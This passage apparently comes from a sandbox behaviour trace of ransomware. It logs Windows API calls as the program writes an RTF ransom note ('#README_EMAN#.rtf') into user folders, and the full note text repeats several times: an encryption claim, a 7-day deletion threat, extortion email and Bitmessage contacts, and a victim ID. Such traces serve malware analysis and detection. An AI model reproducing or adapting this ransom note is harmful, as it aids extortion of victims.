data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.802] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nEwJVUzEVMBMGA1UEChMMRGl\x93/", lpUsedDefaultChar=0x0) returned 8717 [0298.802] WriteFile (in: hFile=0x27c, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.803] CloseHandle (hObject=0x27c) returned 1 [0298.803] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fr\\#readme_eman#.rtf")) returned 0xffffffff [0298.803] GetLastError () returned 0x2 [0298.803] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.804] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 